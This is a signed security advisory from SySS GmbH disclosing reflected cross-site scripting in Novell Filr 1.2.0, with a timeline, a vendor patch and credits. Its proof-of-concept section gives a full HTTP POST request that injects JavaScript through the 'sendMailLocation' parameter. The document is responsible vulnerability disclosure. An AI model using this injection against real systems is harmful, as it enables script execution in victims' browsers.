[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[SYSS-2015-055] Novell Filr - Cross-Site Scripting (CWE-79)



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: Not assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative 
file sharing [1]. High security is an important aspect of the application.

The SySS GmbH could find two reflected cross-site scripting
vulnerabilities in the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified that it is possible to inject JavaScript code
via the parameter "sendMailLocation". 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send
an e-mail to a colleague. When the following HTTP POST request is sent

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden

an e-mail status is provided. When the button to return to the previous 
page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available in 
the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder". 

https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
    https://www.novell.com/products/filr/
[1] SySS GmbH, SYSS-2015-055
    https://www.syss.de/advisories/SYSS-2015-055.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of
the SySS GmbH.

E-Mail: erlijn.vangenuchten@xxxxxxx
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWlR6MAAoJEAylhje9lv8qvRYP/RVh7yLzPthf8I2uM1nfGPwG
AsL+ajdHXVbWJrjHpaIUNwj8zpwQGZ2xVODI6vbt65u5W0gFL7M7HBNUizc+1M5Y
iAUcZXXdDMXcatZfQAW9UDH3ukuz99QIOUHQjFCdxhj+8smX+N+WA7XXEOTS4t+h
8ZvJPNJYEjSxcT8Bw8yt2EFJQaXENbS57MRMuYHQlHPSwOlKMxgNbkGNcfoz50Bp
JCt4u6XCoa1vj4rueAeXLfceyThbBQqdZUo5PGrN+v7N0d+CMYTQ4qp/2J8JSmZE
kCFobKP2pcIpXFFitw+cnzx/pFiK7cnmSxn82mA12Wh8m7knfBTaxqW4mmPsiGzk
KmWvq9JMgI+zy6xei10dzpoxQuDiWXG+SKeP236iHEBo77FpZU6HtIpYM6anAe/A
obr1u0iN8gVBT2dsuXbfeA2MIbwZvkLuTycFpTofL+nQzZM1pIh1QKXQ4rpv6Gjs
RQbliQJmBuEznT/JBceEML3X5VO32jNw0x6sMG8QFXhHAKFNo93IhsMvX0Opfq9C
qeyT3TYrb/kcFaLK/wD6stDCiTMPsEkki1xgodcSKjsfUNcDUvt1lKU6VUBoKvm5
5UfZEqwmOb2XjJNmKED0cedcXKmkkhLK2nNoDEMP5IPyWlyLeszP/1SazfPAVZMU
XJuH8TA6YBt+CyUg3WNZ
=lvzi
-----END PGP SIGNATURE-----